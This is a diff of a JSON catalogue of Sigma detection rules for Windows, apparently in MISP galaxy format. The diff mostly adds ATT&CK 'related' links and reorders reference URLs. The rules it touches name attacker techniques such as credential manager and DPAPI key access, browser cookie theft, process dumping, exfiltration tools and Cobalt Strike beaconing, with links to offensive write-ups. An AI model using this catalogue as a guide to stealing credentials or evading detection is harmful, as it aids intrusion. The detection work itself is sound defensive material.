"https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" ], "tags": [ @@ -27162,6 +34382,15 @@ "attack.t1587.001" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "value": "Creation In User Word Startup Folder" }, @@ -27211,6 +34440,15 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "value": "Rclone Config File Creation" }, @@ -27227,8 +34465,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1552932770464292864", "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://twitter.com/cyb3rops/status/1552932770464292864", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" ], "tags": [ @@ -27279,8 +34517,8 @@ "logsource.category": "file_rename", "logsource.product": "windows", "refs": [ - "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", + "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" ], "tags": [ @@ -27288,6 +34526,15 @@ "attack.t1486" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", "value": "Suspicious Appended Extension" }, @@ -27359,6 +34606,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", "value": "Deletes Backup Files" }, @@ -27384,6 +34640,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "value": "Sysinternals SDelete File Deletion" }, @@ -27408,6 +34673,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", "value": "Delete Log from Application" }, @@ -27431,6 +34705,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "value": "Prefetch File Deletion" }, @@ -27447,8 +34730,8 @@ "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://github.com/hhlxf/PrintNightmare", "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/hhlxf/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml" ], "tags": [ @@ -27459,6 +34742,15 @@ "cve.2021.1675" ] }, + "related": [ + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", "value": "Windows Spooler Service Suspicious File Deletion" }, @@ -27523,8 +34815,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" ], "tags": [ @@ -27532,6 +34824,15 @@ "attack.credential_access" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "value": "Credential Manager Access" }, @@ -27548,8 +34849,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" ], "tags": [ @@ -27557,6 +34858,15 @@ "attack.t1555.004" ] }, + "related": [ + { + "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", "value": "Suspicious Access To Windows DPAPI Master Keys" }, @@ -27585,6 +34895,15 @@ "attack.credential_access" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", "value": "Browser Credential Store Access" }, @@ -27601,8 +34920,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://www.passcape.com/windows_password_recovery_dpapi_credhist", "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", + "https://www.passcape.com/windows_password_recovery_dpapi_credhist", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" ], "tags": [ @@ -27610,6 +34929,15 @@ "attack.t1555.004" ] }, + "related": [ + { + "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", "value": "Suspicious Access To Windows Credential History File" }, @@ -27658,9 +34986,52 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "value": "File Creation Date Changed to Another Year" }, + { + "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", + "meta": { + "author": "frack113", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "dns_query_win_lolbin_appinstaller.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", + "https://twitter.com/notwhickey/status/1333900137232523264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "value": "AppX Package Installation Attempts Via AppInstaller" + }, { "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", "meta": { @@ -27682,6 +35053,15 @@ "attack.t1554" ] }, + "related": [ + { + "dest-uuid": "960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "value": "DNS HybridConnectionManager Service Bus" }, @@ -27706,34 +35086,18 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "065cceea-77ec-4030-9052-fc0affea7110", "value": "DNS Query for Anonfiles.com Domain" }, - { - "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL", - "meta": { - "author": "frack113", - "creation_date": "2021/11/24", - "falsepositive": [ - "Unknown" - ], - "filename": "dns_query_win_lobas_appinstaller.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/notwhickey/status/1333900137232523264", - "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", - "value": "AppInstaller Attempts From URL by DNS" - }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { @@ -27747,9 +35111,9 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml" ], @@ -27758,6 +35122,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "value": "DNS Query To Remote Access Software Domain" }, @@ -27785,6 +35158,22 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", "value": "Regsvr32 Network Activity - DNS" }, @@ -27809,6 +35198,15 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "value": "DNS Query for Ufile.io Upload Domain" }, @@ -27833,6 +35231,15 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", "value": "DNS Query for MEGA.io Upload Domain" }, @@ -27858,6 +35265,15 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", "value": "Suspicious Cobalt Strike DNS Beaconing" }, @@ -27883,6 +35299,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "value": "Suspicious TeamViewer Domain Access" }, @@ -27907,6 +35332,15 @@ "attack.t1090.003" ] }, + "related": [ + { + "dest-uuid": "a782ebe2-daba-42c7-bc82-e8e9d923162d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", "value": "Query Tor Onion Address" }, @@ -27931,6 +35365,15 @@ "attack.t1482" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", "value": "Suspicious LDAP Domain Access" }, @@ -27953,6 +35396,15 @@ "attack.t1189" ] }, + "related": [ + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eb07e747-2552-44cd-af36-b659ae0958e4", "value": "Possible DNS Rebinding" }, @@ -27978,6 +35430,15 @@ "attack.t1590" ] }, + "related": [ + { + "dest-uuid": "9d48cab2-7929-4812-ad22-f536665f0109", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", "value": "Suspicious DNS Query for IP Lookup Service APIs" }, @@ -28027,6 +35488,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", "value": "Suspicious Minimized MSEdge Start" }, @@ -28051,6 +35521,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", "value": "Suspicious Subsystem for Linux Bash Execution" }, @@ -28075,6 +35554,15 @@ "attack.t1218.005" ] }, + "related": [ + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", "value": "MSHTA Spwaned by SVCHOST" }, @@ -28091,8 +35579,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml" ], "tags": [ @@ -28100,6 +35588,15 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", "value": "MMC20 Lateral Movement" }, @@ -28225,6 +35722,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", "value": "Rundll32 InstallScreenSaver Execution" }, @@ -28250,6 +35756,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand" }, @@ -28274,6 +35789,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "value": "Suspicious Control Panel DLL Load" }, @@ -28319,12 +35843,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1433344116071583746", - "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", "https://twitter.com/eral4m/status/1479106975967240209", - "https://twitter.com/eral4m/status/1479080793003671557", "https://twitter.com/Hexacorn/status/885258886428725250", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://twitter.com/nas_bench/status/1433344116071583746", "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", + "https://twitter.com/eral4m/status/1479080793003671557", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" ], "tags": [ @@ -28332,6 +35856,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9", "value": "Suspicious Rundll32 Activity" }, @@ -28356,6 +35889,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3ede524d-21cc-472d-a3ce-d21b568d8db7", "value": "PsExec Service Start" }, @@ -28380,6 +35922,15 @@ "attack.t1217" ] }, + "related": [ + { + "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", "value": "Suspicious DIR Execution" }, @@ -28405,6 +35956,15 @@ "attack.t1021" ] }, + "related": [ + { + "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", "value": "Psexec Accepteula Condition" }, @@ -28421,9 +35981,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", - "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", "https://securelist.com/my-name-is-dtrack/93338/", + "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", + "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" ], "tags": [ @@ -28431,6 +35991,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", "value": "DTRACK Process Creation" }, @@ -28480,6 +36049,15 @@ "attack.t1539" ] }, + "related": [ + { + "dest-uuid": "10ffac09-e42d-4f56-ab20-db94c67d76ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "24c77512-782b-448a-8950-eddb0785fc71", "value": "SQLite Chrome Cookie DB Access" }, @@ -28496,8 +36074,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" ], "tags": [ @@ -28505,6 +36083,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "value": "ScreenConnect Backstage Mode Anomaly" }, @@ -28531,6 +36118,29 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", "value": "Exfiltration and Tunneling Tools Execution" }, @@ -28547,8 +36157,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", + "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" ], "tags": [ @@ -28556,6 +36166,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", "value": "CL_LoadAssembly.ps1 Proxy Execution" }, @@ -28572,8 +36191,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html", + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml" ], "tags": [ @@ -28583,6 +36202,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "value": "DNS RCE CVE-2020-1350" }, @@ -28600,8 +36235,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" ], "tags": [ @@ -28609,6 +36244,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)" }, @@ -28634,6 +36278,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", "value": "XORDump Use" }, @@ -28650,9 +36303,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://twitter.com/frack113/status/1555830623633375232", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" ], "tags": [ @@ -28660,6 +36313,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", "value": "Use Short Name Path in Image" }, @@ -28682,6 +36344,15 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", "value": "MMC Spawning Windows Shell" }, @@ -28753,6 +36424,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "value": "Microsoft IIS Connection Strings Decryption" }, @@ -28777,6 +36457,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", "value": "IOX Tunneling Tool" }, @@ -28793,9 +36482,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", - "https://twitter.com/countuponsec/status/910977826853068800", "https://twitter.com/countuponsec/status/910969424215232518", + "https://twitter.com/countuponsec/status/910977826853068800", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" ], "tags": [ @@ -28803,6 +36492,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", "value": "Dumping Process via Sqldumper.exe" }, @@ -28851,6 +36549,15 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + 